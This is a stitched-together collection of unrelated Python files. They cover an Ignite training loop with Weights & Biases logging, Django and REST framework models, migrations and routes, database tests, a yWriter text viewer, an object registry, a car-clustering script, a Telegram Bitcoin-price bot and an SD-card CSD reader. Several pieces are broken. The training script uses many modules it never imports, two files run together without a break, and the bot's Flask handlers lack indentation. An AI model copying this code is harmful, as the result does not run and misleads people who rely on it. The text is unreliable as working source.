from ignite.engine import Engine, EventEnum, Events, create_supervised_evaluator, create_supervised_trainer
from ignite.handlers import Checkpoint, DiskSaver
from ignite.metrics import Accuracy, Loss, RunningAverage
from ignite.utils import setup_logger
from matplotlib.backends.backend_agg import FigureCanvasAgg
from torch.utils.data import DataLoader
from nemo.datasets import classification_dataloaders
from nemo.models import initialize_classifier
from nemo.utils import ensure_reproducibility, random_state_protection, timestamp_path
class CustomEvents(EventEnum):
    """Extra trainer events fired when example batches and their predictions become available."""
    EXAMPLE_DATA_READY = "example_data_ready"
    EXAMPLE_PREDICTIONS_READY = "example_predictions_ready"
def main(args):
    """Train an image classifier: set up data, model, engines, logging, and checkpoints."""
    # TODO(thomasjo): Make this be configurable.
    ensure_reproducibility(seed=42)

    # Append timestamp to output directory.
    args.output_dir = timestamp_path(args.output_dir)
    args.output_dir.mkdir(parents=True)

    # Development mode overrides: log every step, train only 2 short epochs.
    args.log_interval = 1 if args.dev_mode else 10
    args.max_epochs = 2 if args.dev_mode else args.max_epochs
    args.epoch_length = 2 if args.dev_mode else None

    # TODO(thomasjo): Transition away from pre-partitioned datasets to on-demand partitioning.
    train_dataloader, val_dataloader, test_dataloader = classification_dataloaders(args.data_dir, num_workers=args.num_workers)
    num_classes = len(train_dataloader.dataset.classes)

    model = initialize_classifier(num_classes)
    model = model.to(device=args.device)

    optimizer = optim.Adam(model.parameters(), lr=1e-5)
    # NOTE(review): NLLLoss expects log-probabilities from the model head — confirm.
    criterion = nn.NLLLoss()

    metrics = {
        "loss": Loss(criterion, output_transform=metric_transform),
        "accuracy": Accuracy(output_transform=metric_transform),
    }

    trainer = create_trainer(model, optimizer, criterion, metrics, args)
    evaluator = create_evaluator(model, metrics, args)
    test_evaluator = create_evaluator(model, metrics, args, name="test_evaluator")

    # Register custom events so other handlers can subscribe to them.
    trainer.register_events(*CustomEvents)

    @trainer.on(Events.EPOCH_COMPLETED)
    def compute_validation_metrics(engine: Engine):
        # Development mode overrides.
        max_epochs = args.max_epochs if args.dev_mode else None
        epoch_length = args.epoch_length if args.dev_mode else None
        evaluator.run(val_dataloader, max_epochs=max_epochs, epoch_length=epoch_length)

    @trainer.on(Events.COMPLETED)
    def compute_test_metrics(engine: Engine):
        # Development mode overrides.
        max_epochs = args.max_epochs if args.dev_mode else None
        epoch_length = args.epoch_length if args.dev_mode else None
        test_evaluator.run(test_dataloader, max_epochs=max_epochs, epoch_length=epoch_length)

    @trainer.on(Events.ITERATION_COMPLETED(every=args.log_interval))
    def log_training_metrics(engine: Engine):
        engine.logger.info("Epoch[{}] Iteration[{}/{}] Loss: {:.4f} Accuracy: {:.4f}".format(
            engine.state.epoch,
            engine.state.iteration,
            engine.state.max_epochs * engine.state.epoch_length,
            engine.state.metrics["loss"],
            engine.state.metrics["accuracy"],
        ))

    configure_checkpoint_saving(trainer, evaluator, model, optimizer, args)
    configure_example_predictions(trainer, train_dataloader, val_dataloader, model, args)
    configure_wandb_logging(trainer, evaluator, test_evaluator, model, criterion, optimizer, args)

    # Kick off the whole model training shebang...
    trainer.run(train_dataloader, max_epochs=args.max_epochs, epoch_length=args.epoch_length)
def create_trainer(model, optimizer, criterion, metrics, args):
    """Build the supervised trainer engine with logging and running-average metrics."""
    engine = create_supervised_trainer(
        model,
        optimizer,
        criterion,
        device=args.device,
        non_blocking=True,
        output_transform=trainer_transform,
    )
    engine.logger = setup_logger("trainer")
    # Expose a smoothed (running-average) version of each metric on the trainer.
    for metric_name, metric in metrics.items():
        RunningAverage(metric).attach(engine, metric_name)
    return engine
def create_evaluator(model, metrics, args, name="evaluator"):
    """Build a supervised evaluator engine with its own named logger."""
    engine = create_supervised_evaluator(
        model,
        metrics,
        device=args.device,
        non_blocking=True,
        output_transform=evaluator_transform,
    )
    engine.logger = setup_logger(name)
    return engine
def configure_checkpoint_saving(trainer, evaluator, model, optimizer, args):
    """Attach periodic and best-score checkpointing of model + optimizer state."""
    to_save = {"model": model, "optimizer": optimizer}
    saver = DiskSaver(str(args.output_dir), create_dir=False, require_empty=False)

    # Periodic checkpoints: every epoch in dev mode, otherwise every 5 epochs
    # (capped by the total epoch budget).
    interval = 1 if args.dev_mode else min(5, args.max_epochs)
    periodic = Checkpoint(to_save, saver, n_saved=None,
                          global_step_transform=lambda *_: trainer.state.epoch)
    trainer.add_event_handler(Events.EPOCH_COMPLETED(every=interval), periodic, evaluator)

    # "Best score" checkpoints keyed on the evaluator's accuracy metric.
    metric_name = "accuracy"
    best = Checkpoint(to_save, saver, score_name=metric_name,
                      score_function=lambda engine: engine.state.metrics[metric_name],
                      filename_prefix="best")
    trainer.add_event_handler(Events.EPOCH_COMPLETED, best, evaluator)
def configure_example_predictions(trainer: Engine, train_dataloader, val_dataloader, model, args):
    """Sample a fixed batch of train/val examples and predict on it each epoch.

    The sampled batches are stored on ``trainer.state.examples`` and custom
    events are fired so other handlers (e.g. W&B logging) can consume them.
    """
    example_batch_size = 32
    # Draw the example batches once, without disturbing the global RNG state.
    with random_state_protection():
        train_examples = grab_shuffled_data(train_dataloader, example_batch_size, args)
        val_examples = grab_shuffled_data(val_dataloader, example_batch_size, args)
    @trainer.on(Events.EPOCH_STARTED)
    def store_examples(engine: Engine):
        # (Re)attach the fixed example batches to the engine state each epoch.
        engine.state.examples = {"training": train_examples, "validation": val_examples}
        engine.logger.info("Example data ready")
        engine.fire_event(CustomEvents.EXAMPLE_DATA_READY)
    @trainer.on(Events.EPOCH_COMPLETED)
    def predict_on_examples(engine: Engine):
        # Run the model on each stored batch and extend the stored tuples
        # with the (CPU) predictions: (x, y) -> (x, y, y_pred).
        model.eval()
        for tag, (x, y) in engine.state.examples.items():
            with torch.no_grad():
                y_pred = model(x.to(device=args.device))
            y_pred = y_pred.detach().cpu()
            engine.state.examples[tag] = (x, y, y_pred)
        engine.logger.info("Example predictions ready")
        engine.fire_event(CustomEvents.EXAMPLE_PREDICTIONS_READY)
def configure_wandb_logging(trainer, evaluator, test_evaluator, model, criterion, optimizer, args):
    """Wire Weights & Biases logging onto the training and eval engines.

    Logs batch loss during training, per-epoch metrics for all three engines,
    the epoch counter, and image grids of the per-epoch example predictions.
    """
    if args.dev_mode:
        # "dryrun" keeps W&B runs local instead of syncing to the cloud.
        os.environ["WANDB_MODE"] = "dryrun"
    wandb_logger = WandBLogger(dir=str(args.output_dir))
    wandb_logger.watch(model, criterion, log="all", log_freq=args.log_interval)
    # Log training-specific metrics.
    wandb_logger.attach_output_handler(
        trainer,
        event_name=Events.ITERATION_COMPLETED(every=args.log_interval),
        tag="training",
        output_transform=lambda output: {"batchloss": output["loss"]},
        global_step_transform=lambda *_: trainer.state.iteration,
    )
    # Configure basic metric logging. All engines share the trainer's
    # iteration count as the global step so their curves line up on one axis.
    for tag, engine in [("training", trainer), ("validation", evaluator), ("test", test_evaluator)]:
        wandb_logger.attach_output_handler(
            engine,
            event_name=Events.EPOCH_COMPLETED,
            tag=tag,
            metric_names="all",
            global_step_transform=lambda *_: trainer.state.iteration,
        )
    # Track the epoch associated with the current training iteration.
    @trainer.on(Events.ITERATION_STARTED(every=args.log_interval))
    def log_epoch(engine: Engine):
        # commit=False merges the epoch value into the next logged step.
        wandb_logger.log({"epoch": engine.state.epoch}, step=engine.state.iteration, commit=False)
    @trainer.on(CustomEvents.EXAMPLE_PREDICTIONS_READY)
    def log_example_predictions(engine: Engine):
        for tag, (x, y, y_pred) in engine.state.examples.items():
            x, y, y_pred = x.numpy(), y.numpy(), y_pred.numpy()
            # Convert log scale (torch.log_softmax) predictions.
            y_pred = np.exp(y_pred)
            # Prepare images for plotting.
            moments = engine.state.dataloader.dataset.moments
            x = x.transpose(0, 2, 3, 1)  # NCHW -> NHWC
            x = x * moments["std"] + moments["mean"]  # Denormalize using dataset moments
            x = x.clip(0, 1)
            # Plot grid of predictions for "example" batch.
            idx_to_class = {v: k for k, v in engine.state.dataloader.dataset.class_to_idx.items()}
            image = prediction_grid(x, y, y_pred, idx_to_class)
            # Log the prediction grid image to W&B.
            wandb_logger.log({f"{tag}/examples": wandb_logger.Image(image)}, step=engine.state.iteration)
def prediction_grid(x: np.ndarray, y: np.ndarray, y_pred: np.ndarray, idx_to_class: dict):
    """Render a grid of example images titled with predicted/true labels.

    x -- images as an NHWC float array with values in [0, 1].
    y -- integer class labels.
    y_pred -- per-class probability scores for each image.
    idx_to_class -- mapping from class index to display name.
    Returns the rendered figure as an RGBA numpy array.
    """
    max_images = min(32, x.shape[0])
    num_cols = min(8, max_images)
    num_rows = max(1, ceil(max_images / num_cols))
    fig, axs = plt.subplots(
        num_rows,
        num_cols,
        dpi=300,
        constrained_layout=True,
        gridspec_kw={
            "hspace": 0,
            "wspace": 0,
        },
        subplot_kw={
            "frame_on": False,
            "xticks": [],
            "yticks": [],
        },
    )
    # BUGFIX: plt.subplots returns a bare Axes (no `.flat`) when
    # num_rows == num_cols == 1, so a single-image batch used to crash.
    # Normalize to a flat array of axes before iterating.
    axes = np.asarray(axs).reshape(-1)
    for ax, image, label, scores in zip(axes, x, y, y_pred):
        ax.imshow(image)
        # Encode labels and softmax scores in subplot title.
        prediction = np.argmax(scores)
        text = "{} {:.4f} ({})".format(idx_to_class[prediction], scores[prediction], idx_to_class[label])
        ax.set_title(text, {
            # Green title for a correct prediction, red otherwise.
            "color": "green" if prediction == label else "red",
            "fontsize": 2.5,
        })
    fig_image = render_figure(fig)
    plt.close(fig)
    return fig_image
def render_figure(fig: plt.Figure):
    """Rasterize *fig* and return its pixels as an RGBA numpy array."""
    agg = FigureCanvasAgg(fig)
    agg.draw()
    return np.array(agg.buffer_rgba())
def grab_shuffled_data(dataloader: DataLoader, batch_size: int, args: Namespace):
    """Return one randomly shuffled batch of *batch_size* items drawn from
    the given loader's underlying dataset."""
    shuffled = DataLoader(dataloader.dataset, batch_size=batch_size, shuffle=True)
    return next(iter(shuffled))
def trainer_transform(x, y, y_pred, loss):
    """Package a training step's tensors and scalar loss into an output dict."""
    return dict(x=x, y=y, y_pred=y_pred, loss=loss.item())
def evaluator_transform(x, y, y_pred):
    """Package an evaluation step's tensors into an output dict."""
    return dict(x=x, y=y, y_pred=y_pred)
def metric_transform(output):
    """Adapt an engine output dict to the (y_pred, y) pair metrics expect."""
    prediction = output["y_pred"]
    target = output["y"]
    return prediction, target
def parse_args():
    """Define and parse the training script's command-line interface."""
    cli = ArgumentParser()
    # Required locations.
    cli.add_argument("--data-dir", type=Path, metavar="PATH", required=True, help="path to partitioned data directory")
    cli.add_argument("--output-dir", type=Path, metavar="PATH", required=True, help="path to output directory")
    # Runtime configuration.
    cli.add_argument("--device", type=torch.device, metavar="NAME", default="cuda", help="device to use for model training")
    cli.add_argument("--num-workers", type=int, metavar="NUM", default=2, help="number of workers to use for data loaders")
    cli.add_argument("--max-epochs", type=int, metavar="NUM", default=25, help="maximum number of epochs to train")
    cli.add_argument("--dev-mode", action="store_true", help="run each model phase with only one batch")
    return cli.parse_args()
# Script entry point: parse CLI arguments and launch training.
if __name__ == "__main__":
    _args = parse_args()
    main(_args)
|
# Generated by Django 2.1.5 on 2020-01-04 12:04
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Adds a user binding to AppModel and created/updated timestamps to
    # WxGroup and WxUser.
    dependencies = [
        ('robot', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='appmodel',
            name='bind_user',
            # SET_NULL (with null=True) keeps the app row if the bound user is deleted.
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='robot.WxUser'),
        ),
        migrations.AddField(
            model_name='wxgroup',
            name='insert_time',
            # auto_now_add needs a one-off default to backfill existing rows;
            # preserve_default=False drops that default after the migration runs.
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='wxgroup',
            name='update_time',
            field=models.DateTimeField(auto_now=True),
        ),
        migrations.AddField(
            model_name='wxuser',
            name='insert_time',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='wxuser',
            name='update_time',
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
from rest_framework import viewsets
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from . import serializers as serializers
from . import models as models
class LaboratoryViewSet(viewsets.ModelViewSet):
    """CRUD API for laboratories visible to the requesting user."""

    authentication_classes = (JWTAuthentication, SessionAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = serializers.LaboratorySerializer

    def get_queryset(self):
        """Limit results to the requester's laboratories, newest first."""
        queryset = models.Laboratory.objects.filter(users=self.request.user)
        return queryset.order_by('-created')

    def perform_create(self, serializer):
        """Create the laboratory and enrol its creator as a member."""
        new_lab = serializer.save()
        new_lab.users.add(self.request.user)
import pytest
from uuid import UUID
from zeus import factories
from zeus.db.utils import create_or_update, try_create
# we use the User model to test
from zeus.models import User
def test_try_create_only_where_new_instance():
    """try_create with only a where clause should insert and return the row."""
    user = try_create(User, {"email": "foo@example.com"})
    assert user
    assert user.email == "foo@example.com"
def test_try_create_with_defaults_new_instance():
    """Defaults should be applied when try_create inserts a new row."""
    fixed_id = UUID("5edb7312-316e-11ea-b6cd-8c85906d3733")
    user = try_create(User, {"id": fixed_id}, {"email": "foo@example.com"})
    assert user
    assert user.id == fixed_id
    assert user.email == "foo@example.com"
@pytest.mark.xfail
def test_try_create_only_where_existing_instance(default_user):
    """try_create must return nothing when a matching row already exists."""
    existing = try_create(User, {"email": default_user.email})
    assert not existing
@pytest.mark.xfail
def test_try_create_with_defaults_existing_instance(default_user):
    """Defaults must not be written over an already-existing row."""
    existing = try_create(
        User, {"id": default_user.id}, {"email": "defnotreal@example.com"}
    )
    assert not existing
def test_create_or_update_new_instance(db_session):
    """create_or_update inserts when no row matches, leaving others alone."""
    bystander = factories.UserFactory.create()
    user, created = create_or_update(User, {"email": "defnotreal@example.com"})
    assert created
    assert user.email == "defnotreal@example.com"
    # The unrelated row must be untouched by the insert.
    db_session.refresh(bystander)
    assert bystander.email != "defnotreal@example.com"
@pytest.mark.xfail
def test_create_or_update_existing_instance(db_session, default_user):
    """create_or_update updates the matching row, leaving others alone."""
    bystander = factories.UserFactory.create()
    user, created = create_or_update(
        User, {"id": default_user.id}, {"email": "defnotreal@example.com"}
    )
    assert not created
    assert user.email == "defnotreal@example.com"
    # The unrelated row must be untouched by the update.
    db_session.refresh(bystander)
    assert bystander.email != "defnotreal@example.com"
|
#!/usr/bin/env python3
""""Provide a tkinter text box class for file viewing.
Copyright (c) 2022 Peter Triesberger
For further information see https://github.com/peter88213/yw-viewer
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
import re
import tkinter as tk
from ywviewerlib.rich_text_tk import RichTextTk
class FileViewer:
    """A tkinter text box class for yWriter file viewing.
    Public methods:
        view_text(taggedText) -- load tagged text into the text box.
        build_views() -- create tagged text for quick viewing.
        reset_view() -- clear the text box.
    Public instance variables:
        prjDescription -- list of tuples: Project description.
        chapterTitles -- list of tuples: List of chapter titles.
        chapterDescriptions -- list of tuples: Text containing chapter titles and descriptions.
        sceneTitles -- list of tuples: Text containing chapter titles and listed scene titles.
        sceneDescriptions -- list of tuples: Text containing chapter titles and scene descriptions.
        sceneContents -- list of tuples: Text containing chapter titles and scene contents.
    Show titles, descriptions, and contents in a text box.
    """

    def __init__(self, ui):
        """Put a text box to the GUI main window.
        Positional arguments:
            ui -- the application's main view; must provide a viewerWindow
                  widget and a ywPrj yWriter project object.
        """
        self._ui = ui
        self._textBox = RichTextTk(self._ui.viewerWindow, height=20, width=60, spacing1=10, spacing2=2, wrap='word', padx=40)
        self._textBox.pack(expand=True, fill='both')
        self.prjDescription = []
        self.chapterTitles = []
        self.chapterDescriptions = []
        self.sceneTitles = []
        self.sceneDescriptions = []
        self.sceneContents = []

    def view_text(self, taggedText):
        """Load tagged text into the text box.
        Positional arguments:
            taggedText -- list of (text, formatting tag) tuples.
        Disable text editing.
        """
        self._textBox['state'] = 'normal'
        self._textBox.delete('1.0', tk.END)
        for text, tag in taggedText:
            self._textBox.insert(tk.END, text, tag)
        self._textBox['state'] = 'disabled'

    def build_views(self):
        """Create tagged text for quick viewing.
        Return a string containing the total numbers of chapters, scenes and words.
        """

        def convert_from_yw(text):
            """Remove yw7 markup such as [i], [/b], [h1] from text."""
            # BUGFIX: use a raw string and drop "|" from the character class.
            # The original pattern '[i|b|h|c|r|s|u]' treated "|" as a literal
            # class member, so it also stripped bogus "[|]" tags, and the
            # non-raw string relied on invalid escape sequences.
            return re.sub(r'\[\/*[ibhcrsu]\d*\]', '', text)

        # Get project description.
        self.prjDescription = []
        if self._ui.ywPrj.desc:
            self.prjDescription.append((self._ui.ywPrj.desc, ''))
        else:
            self.prjDescription.append(('(No project description available)', 'italic'))
        self.chapterTitles = []
        self.chapterDescriptions = []
        self.sceneTitles = []
        self.sceneDescriptions = []
        self.sceneContents = []
        chapterCount = 0
        sceneCount = 0
        wordCount = 0
        for chId in self._ui.ywPrj.srtChapters:
            # Skip unused chapters and chapters of non-normal type.
            if self._ui.ywPrj.chapters[chId].isUnused:
                continue
            if self._ui.ywPrj.chapters[chId].chType != 0 and self._ui.ywPrj.chapters[chId].oldType != 0:
                continue
            chapterCount += 1
            # Chapter level selects the heading style (part vs. chapter).
            if self._ui.ywPrj.chapters[chId].chLevel == 0:
                headingTag = RichTextTk.H2_TAG
                listTag = ''
            else:
                headingTag = RichTextTk.H1_TAG
                listTag = RichTextTk.BOLD_TAG
            # Get chapter titles.
            if self._ui.ywPrj.chapters[chId].title:
                self.chapterTitles.append((f'{self._ui.ywPrj.chapters[chId].title}\n', listTag))
                sceneHeading = (f'{self._ui.ywPrj.chapters[chId].title}\n', headingTag)
                self.sceneTitles.append(sceneHeading)
            # Get chapter descriptions.
            if self._ui.ywPrj.chapters[chId].desc:
                self.chapterDescriptions.append((f'{self._ui.ywPrj.chapters[chId].title}\n', headingTag))
                self.chapterDescriptions.append((f'{self._ui.ywPrj.chapters[chId].desc}\n', ''))
            for scId in self._ui.ywPrj.chapters[chId].srtScenes:
                if not (self._ui.ywPrj.scenes[scId].isUnused or self._ui.ywPrj.scenes[scId].isNotesScene or self._ui.ywPrj.scenes[scId].isTodoScene):
                    sceneCount += 1
                    # Get scene titles.
                    if self._ui.ywPrj.scenes[scId].title:
                        self.sceneTitles.append((f'{self._ui.ywPrj.scenes[scId].title}\n', ''))
                    # Get scene descriptions.
                    if self._ui.ywPrj.scenes[scId].desc:
                        self.sceneDescriptions.append(sceneHeading)
                        self.sceneDescriptions.append((f'{self._ui.ywPrj.scenes[scId].desc}\n', ''))
                    # Get scene contents.
                    if self._ui.ywPrj.scenes[scId].sceneContent:
                        self.sceneContents.append(sceneHeading)
                        self.sceneContents.append((convert_from_yw(f'{self._ui.ywPrj.scenes[scId].sceneContent}\n'), ''))
                    # Subsequent scenes in the chapter get a divider heading.
                    sceneHeading = ('* * *\n', RichTextTk.CENTER_TAG)
                    # Get scene word count.
                    if self._ui.ywPrj.scenes[scId].wordCount:
                        wordCount += self._ui.ywPrj.scenes[scId].wordCount
        # Provide italic placeholders for any empty view.
        if not self.chapterTitles:
            self.chapterTitles.append(('(No chapter titles available)', RichTextTk.ITALIC_TAG))
        if not self.chapterDescriptions:
            self.chapterDescriptions.append(('(No chapter descriptions available)', RichTextTk.ITALIC_TAG))
        if not self.sceneTitles:
            self.sceneTitles.append(('(No scene titles available)', RichTextTk.ITALIC_TAG))
        if not self.sceneDescriptions:
            self.sceneDescriptions.append(('(No scene descriptions available)', RichTextTk.ITALIC_TAG))
        if not self.sceneContents:
            self.sceneContents.append(('(No scene contents available)', RichTextTk.ITALIC_TAG))
        return f'{chapterCount} chapters, {sceneCount} scenes, {wordCount} words'

    def reset_view(self):
        """Clear the text box."""
        self._textBox['state'] = 'normal'
        self._textBox.delete('1.0', tk.END)
        self._textBox['state'] = 'disabled'
|
from siptrackdlib import errors
from siptrackdlib import log
class ObjectClass(object):
    """A class definition in the object registry.

    Holds the registered class itself together with the set of class ids
    that may appear as its children.
    """

    def __init__(self, class_reference):
        self.class_reference = class_reference
        # Maps child class_id -> None; used purely as a membership set.
        self.valid_children = dict()

    def registerChild(self, class_reference):
        """Mark class_reference's class_id as an allowed child class."""
        child_id = class_reference.class_id
        self.valid_children[child_id] = None
class ObjectRegistry(object):
    """Keeps track of registered classes and their valid children.

    The object registry is used to keep track of valid classes and
    what classes are valid children of a class.
    It also allocates object ids and can be used to create new objects
    based on the registry.
    """

    def __init__(self):
        self.object_classes = {}
        self.object_classes_by_name = {}
        # Monotonically increasing counter backing allocateOID().
        self.next_oid = 0

    def registerClass(self, class_reference):
        """Register a new class.

        This creates a new ObjectClass and stores it in the registry,
        enabling creation of objects of the given class.
        The returned ObjectClass object can be used to register valid
        children of the class.
        """
        object_class = ObjectClass(class_reference)
        self.object_classes[class_reference.class_id] = object_class
        self.object_classes_by_name[class_reference.class_name] = object_class
        return object_class

    def isValidChild(self, parent_id, child_id):
        """Check if a class is a valid child of another class."""
        if parent_id not in self.object_classes:
            return False
        return child_id in self.object_classes[parent_id].valid_children

    def getClass(self, class_name):
        """Return the class reference registered under class_name, or None."""
        if class_name in self.object_classes_by_name:
            return self.object_classes_by_name[class_name].class_reference
        return None

    def getClassById(self, class_id):
        """Return the class reference registered under class_id, or None."""
        if class_id in self.object_classes:
            return self.object_classes[class_id].class_reference
        return None

    def getIDByName(self, class_name):
        """Return a class's id given its name, or None if unregistered."""
        if class_name in self.object_classes_by_name:
            object_class = self.object_classes_by_name[class_name]
            return object_class.class_reference.class_id
        return None

    def allocateOID(self):
        """Allocate a new oid (returned as a string)."""
        ret = str(self.next_oid)
        self.next_oid += 1
        return ret

    def revertOID(self):
        """Revert the most recent oid allocation."""
        self.next_oid -= 1

    def createObject(self, class_id, parent_branch, *args, **kwargs):
        """Try to create a new object based on a registered class.

        This will try to create a new object of 'class_id' type, allocating
        its own oid. A new branch will also be created in the object
        tree to hold the object.
        """
        if class_id not in self.object_classes:
            raise errors.SiptrackError(
                'trying to create object with invalid class id \'%s\'' % (class_id))
        object_class = self.object_classes[class_id]
        oid = self.allocateOID()
        branch = parent_branch.add(oid)
        try:
            obj = object_class.class_reference(oid, branch, *args, **kwargs)
        except Exception:
            # Roll back the partially created branch and the oid allocation
            # before re-raising the original error.
            branch.remove(recursive = False, callback_data = None)
            self.revertOID()
            raise
        branch.ext_data = obj
        return obj

    def _createObject(self, class_id, branch):
        """Try to create _only_ a new object based on an oid and class id.

        Similar to createObject, but takes a class id and an oid and only
        creates a new object, no branch etc.
        """
        if class_id not in self.object_classes:
            raise errors.SiptrackError(
                'trying to create object with invalid class id \'%s\'' % (class_id))
        object_class = self.object_classes[class_id]
        obj = object_class.class_reference(branch.oid, branch)
        return obj
object_registry = ObjectRegistry()
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from . import views
# Router generates the CRUD routes for the seeker/employer viewsets.
# NOTE(review): `base_name` was renamed to `basename` in DRF 3.9+ — confirm
# the pinned djangorestframework version before upgrading.
router = DefaultRouter(trailing_slash=True)
router.register('seekers', views.SeekerViewSet, base_name='seeker')
router.register('employers', views.EmployerViewSet, base_name='employer')
urlpatterns = [
    # Browsable-API login/logout views.
    path('api-auth/', include('rest_framework.urls')),
    # Oauth2 endpoints
    path('o/token/', views.ProfileTokenView.as_view(), name="token"),
    path('o/', include('oauth2_provider.urls', namespace='oauth2_provider')),
    # Signup and profile info
    path('signup/seeker/', views.signup_seeker, name='signup_seeker'),
    path('signup/employer/', views.signup_employer, name='signup_employer'),
    path('me/', views.me, name='me'),
    # view sets
    path('', include(router.urls)),
]
|
# K-Means Clustering
# NOTE: despite the title, this script performs *hierarchical* (agglomerative)
# clustering of the cars dataset into three groups (US / Japan / Europe).

# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Importing the dataset
dataset = pd.read_csv('cars.csv')
X = dataset.iloc[:, :-1].values
X = pd.DataFrame(X)
# BUGFIX: DataFrame.convert_objects() was removed from pandas; coerce each
# column to numeric instead (unparsable entries become NaN). The original
# script also ran the same conversion/column-assignment twice — the duplicate
# copy-pasted lines were dropped.
X = X.apply(pd.to_numeric, errors='coerce')
X.columns = ['mpg', ' cylinders', ' cubicinches', ' hp', ' weightlbs', ' time-to-60', 'year']

# Eliminating null values: fill NaNs with the (truncated) column mean,
# then verify no nulls remain.
for i in X.columns:
    X[i] = X[i].fillna(int(X[i].mean()))
for i in X.columns:
    print(X[i].isnull().sum())

# Using the dendrogram to find the optimum number of clusters
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean Distances')
plt.show()

# Fitting hierarchical clustering to the dataset
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters=3, affinity='euclidean', linkage='ward')
y_hc = hc.fit_predict(X)

# BUGFIX: DataFrame.as_matrix() was removed from pandas; use to_numpy().
X = X.to_numpy()

# Visualising the clusters (first two feature columns)
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s=100, c='red', label='US')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s=100, c='blue', label='Japan')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s=100, c='green', label='Europe')
plt.title('Clusters of car brands')
plt.legend()
plt.show()
import telebot
import os
import requests
import threading
from flask import Flask, request
from emoji import emojize
# Configuration is read from environment variables (set these in your
# Heroku app settings).
# Telegram bot token (issued by @BotFather).
token = os.environ.get('TOKEN')
# Public URL of the Heroku app; "/bot" is the webhook path Telegram posts to.
appURL = os.environ.get('APPURL') + '/bot'
# Chat id of the channel the bot posts price updates to.
chatID = os.environ.get('CHATID')
# End of config; build the bot client and the Flask app serving the webhook.
bot = telebot.TeleBot(token)
server = Flask(__name__)
def requestAPI():
    """Fetch the current Bitcoin quote from CoinMarketCap, post a formatted
    price message to the configured channel, and reschedule itself to run
    again in an hour.
    """
    url = "https://api.coinmarketcap.com/v1/ticker/bitcoin"
    response = requests.get(url)
    name = response.json()[0]['name']
    price = response.json()[0]['price_usd']
    # 24 hours price change with emoji.
    # BUGFIX: default the emoji to an empty string — the original if/elif
    # chain had no final else, so a change of exactly 0% left the variable
    # unbound and crashed the message formatting below.
    rate24h = response.json()[0]['percent_change_24h']
    rate24hemoji = ''
    if float(rate24h) > 20:
        rate24hemoji = emojize(":rocket:", use_aliases=True)
    elif float(rate24h) < 0:
        rate24hemoji = emojize(":small_red_triangle_down:", use_aliases=True)
    elif float(rate24h) > 0:
        rate24hemoji = emojize(":white_check_mark:", use_aliases=True)
    # 7 days price change with emoji (same unbound-variable fix as above).
    rate7d = response.json()[0]['percent_change_7d']
    rate7demoji = ''
    if float(rate7d) > 20:
        rate7demoji = emojize(":rocket:", use_aliases=True)
    elif float(rate7d) < 0:
        rate7demoji = emojize(":small_red_triangle_down:", use_aliases=True)
    elif float(rate7d) > 0:
        rate7demoji = emojize(":white_check_mark:", use_aliases=True)
    text = "Current *" + name + "* price - *${}".format(price) + "*" \
        + "\nLast 24hours changed for *" + rate24h + "%*" + rate24hemoji \
        + "\nLast 7days changed for *" + rate7d + "%*" + rate7demoji
    bot.send_message(chatID, text, parse_mode="Markdown")
    # time period each 3600 seconds = 1 hour
    threading.Timer(3600, requestAPI).start()
requestAPI()
@server.route("/bot", methods=['POST'])
def getMessage():
bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode("utf-8"))])
return "!", 200
@server.route("/")
def webhook():
bot.remove_webhook()
bot.set_webhook(url=appURL)
return "!", 200
# Start the Flask server; Heroku supplies the port via $PORT.
# BUGFIX: a stray duplicate `server = Flask(__name__)` that followed this
# call was removed — it rebound the app object after the (blocking) server
# had already started and was never used.
server.run(host="0.0.0.0", port=int(os.environ.get('PORT', 5000)))
#!/usr/bin/env python2
import sys
def unstuff(x, start, size):
    """Extract a *size*-bit field from integer *x* starting at bit *start*."""
    mask = (1 << size) - 1
    return (x >> start) & mask
def main(name, args):
    """Print the erase block size of an SD/MMC card.

    name -- program name, used in the usage message.
    args -- argument list; must hold exactly one block device name
            (e.g. "mmcblk0").
    Returns 100 on bad usage; otherwise falls through (implicitly None).
    """
    if len(args) != 1:
        print "Syntax: %s <card>" % (name, )
        print "Example: %s mmcblk0" % (name, )
        return 100
    card = args[0]
    # The kernel exposes the card's raw CSD register as hex text in sysfs.
    dev = "/sys/class/block/%s/device/csd" % (card, )
    csd = int(file(dev).read(), 16)
    # Bits 22-25: write block size exponent — presumably WRITE_BL_LEN per the
    # SD CSD register layout; confirm against the SD specification.
    write_block_size = 2**unstuff(csd,22,4)
    # Bits 39-45: erase sector size in write blocks, minus one — presumably
    # SECTOR_SIZE per the CSD layout; confirm against the SD specification.
    erase_block_size = write_block_size*(unstuff(csd,39,7)+1)
    print "Erase block size of %s is %d bytes." % (card, erase_block_size)
sys.exit(main(sys.argv[0], sys.argv[1:]))
|
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils import timezone
@python_2_unicode_compatible  # only if you need to support Python 2
class signals(models.Model):
    # One row of daily price data and derived statistics for an instrument
    # identified by BBG (presumably a Bloomberg ticker — confirm).
    Date = models.DateField()
    Close = models.FloatField()
    # Exponentially weighted moving averages over 10/20/50/100 periods.
    ewma_10 = models.FloatField()
    ewma_20 = models.FloatField()
    ewma_50 = models.FloatField()
    ewma_100 = models.FloatField()
    var = models.FloatField()
    mean = models.FloatField()
